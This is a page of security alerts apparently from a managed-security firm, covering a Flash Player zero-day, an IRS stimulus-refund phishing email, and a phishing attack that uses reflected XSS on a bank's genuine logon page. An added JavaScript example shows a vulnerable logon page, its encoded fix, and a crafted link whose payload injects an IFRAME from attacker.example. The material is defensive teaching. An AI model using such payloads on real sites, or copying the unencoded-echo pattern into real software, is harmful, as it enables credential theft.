
Security Alerts

ADOBE FLASH PLAYER ZERO-DAY VULNERABILITY

Simply Put: Adobe’s Flash Player has a new, zero-day vulnerability. "Zero-day" means a vulnerability for which the vendor has not yet released a patch; in this case it is also being actively exploited on the Internet. Adobe Flash Player is used to display Flash files (.swf) in web pages; these files are normally seen as movies or animations. The vulnerability can be used to run malicious code on a user’s machine without notification or permission. Gladiator considers this issue extremely critical.

Attack Details: There are no details currently available from Adobe. The version initially reported as vulnerable is 9.0.124.0, but other versions may also be affected.

Countermeasures: Users should be reminded not to visit untrusted websites and not to click on links to pages they have never visited. Keep checking the links below for information on when a patch will be available. Once a patch is available, be sure that all users in the organization install it. Check all servers and critical workstations for Flash Player and uninstall it where it is not required.

If you are using Mozilla Firefox, Gladiator suggests downloading the NoScript plugin. NoScript will block all scripts and active content unless specifically allowed for each site. This will prevent Flash files from running without permission. The link is included below for your convenience. Gladiator is not aware of an Internet Explorer plugin with these capabilities.

Reference Links:
Security Focus Advisory
Secunia Advisory

ADOBE FLASH PLAYER ZERO-DAY VULNERABILITY [RESOLVED]

Resolution: Adobe has released more information on this vulnerability. Contrary to the initial report, the bug was fixed in Adobe Flash Player 9.0.124.0; versions prior to 9.0.124.0 remain vulnerable. Therefore, Gladiator recommends that all institutions upgrade to Adobe Flash Player 9.0.124.0 or later as soon as possible.

Reference Links:
Adobe Flash Player Latest Version

ECONOMIC STIMULUS REFUND IRS PHISHING ADVISORY

Simply Put: A new phishing scam is currently making its way around the internet. Phishers are sending out email which appears to come from the IRS with information on your 2008 Economic Stimulus Refund. The email requests that you fill out an online form with your personal information so the check can be directly deposited in your bank account. The link to the form is included in the email. This email is not from the IRS, and is designed to steal a person’s identity.

Attack Details: Hoax-slayer.com has examples of both the email and the form in its advisory (linked below). Some variants also carry malicious code embedded in the email itself. All emails matching this description should be deleted when received. Do not open the email or click on any embedded links.

Countermeasures: Users should be notified that these emails are circulating on the internet. Do not open or respond to any email asking for personal information. If an email appears to come from a known source, browse to the company’s website to double-check the authenticity of the information. Type the company’s address in manually; do not rely on embedded links.

Reference Links:
hoax-slayer.com advisory
IRS advisory

NEW PHISHING ATTACK

Simply Put: A new phishing attack has targeted customers of a financial institution in Italy. This attack is unusual because it links to the institution’s actual website instead of to a fake website, as most phishing attacks do. Once the customer clicks on the link in the email, they are taken to the institution’s genuine website to log on. However, code embedded in the link runs on that page and lets the attacker capture the username and password as the user logs in. The credentials are recorded by the attacker for later use.

Let’s go through an example of what this might look like. A financial institution’s website address is:

https://www.myinstitutionname.com

and the logon page for the institution is:

https://www.myinstitutionname.com/logon.asp.

If this page were vulnerable to cross-site scripting (XSS), for example by echoing a query parameter into the page without encoding it, an attacker could send out a link that looks like:

https://www.myinstitutionname.com/logon.asp?user=%20$21script%34source%…

Notice how the domain name is always the same. Most users would only check the target domain, which is the institution’s own website, so they would inherently trust this link. If clicked, the additional code at the end of the link would run in the browser as part of the financial institution’s page, in the same origin and with the same privileges as the institution’s own scripts.

Attack Details: The attack uses a cross-site scripting (XSS) vulnerability in the institution’s website. Because the link points at the institution’s real site, the SSL certificate presented to the browser is the bank’s own valid certificate; the attacker only alters the link to include new code, such as malicious JavaScript or HTML. This code is loaded in the client’s browser with the same trust level as the financial website being visited. This specific attack injects an IFRAME which loads a website hosted in Taiwan directly within the institution’s existing page. Screen shots of this specific attack are included in the Netcraft article below.
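The attack just described, as an added example that is not part of the original advisory: a hypothetical logon page that echoes the user query parameter into its HTML without encoding, the same page with output encoding applied, and the kind of link an attacker would mail out. The domain is the advisory's own placeholder; the user parameter, the attacker host attacker.example and all function names are assumptions for illustration, not code from the affected institution.

```javascript
// Added example (not from the original advisory): how a reflected XSS in a
// genuine login page turns a same-domain link into a credential-stealing one.
// The domain, the "user" parameter and the attacker host are hypothetical.

// A logon page that pre-fills the username box by echoing the "user" query
// parameter straight into the HTML. This is the vulnerable pattern.
function renderLogonVulnerable(queryString) {
  const user = new URLSearchParams(queryString).get('user') || '';
  return '<form method="post" action="/logon.asp">' +
         '<input name="user" value="' + user + '">' +
         '<input name="pass" type="password"></form>';
}

// Minimal HTML encoder for text and attribute values: the fix is to encode
// every reflected value on output, so markup characters lose their meaning.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// The same page with the parameter encoded before it is placed in the markup.
function renderLogonHardened(queryString) {
  const user = new URLSearchParams(queryString).get('user') || '';
  return '<form method="post" action="/logon.asp">' +
         '<input name="user" value="' + htmlEncode(user) + '">' +
         '<input name="pass" type="password"></form>';
}

// The link the attacker mails out. Host and certificate are the bank's own;
// only the query string carries the payload, which closes the value attribute
// and injects an IFRAME pointing at an attacker-controlled host (hypothetical).
const ATTACKER_LINK =
  'https://www.myinstitutionname.com/logon.asp?user=' +
  encodeURIComponent('"><iframe src="https://attacker.example/"></iframe>');

// What a user checking "the domain in the link" sees, and what the server sees.
function hostOf(link) { return new URL(link).hostname; }
function queryOf(link) { return new URL(link).search; }

// True when the rendered page contains an IFRAME the attacker injected.
function hasInjectedIframe(html) { return /<iframe\b/i.test(html); }

// Stand-alone run (CommonJS only; harmless elsewhere).
if (typeof require !== 'undefined' && require.main === module) {
  const q = queryOf(ATTACKER_LINK);
  console.log('link host:', hostOf(ATTACKER_LINK));
  console.log('vulnerable page injected?', hasInjectedIframe(renderLogonVulnerable(q)));
  console.log('hardened page injected?', hasInjectedIframe(renderLogonHardened(q)));
}
```

Run it with node. The host check passes for both pages, which is exactly why looking at the domain or the lock icon is not enough; only the page that encodes the reflected parameter renders the payload as harmless text.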

Countermeasures: This attack is of concern because most anti-phishing material suggests looking at the domain name in the link to see if it is legitimate, or checking for the SSL “lock” at the bottom of the browser window while at the site. Since the domain name and the SSL certificate in this attack belong to the bank, many users could be tricked into putting themselves at risk. Gladiator suggests that all financial institutions review the anti-phishing notices on their websites. They should include a warning never to log in to a secure website by clicking on ANY link in an email, even one with the correct domain name. Users should instead type the domain name into the browser or use a shortcut they have set up themselves. The root cause is on the server side: a page that echoes a request parameter into its HTML without encoding it. HTML-encoding every reflected value on output closes the hole, whereas user awareness only reduces how often it is triggered. If a financial institution runs its own website and is concerned about such vulnerabilities, it can contract with an application vulnerability assessment firm to check its site. If you have any questions, please contact the Gladiator Security Operations Center at 678.461.4620 or soc@gladtech.net.

Reference Links:
Web Application Security Consortium
Netcraft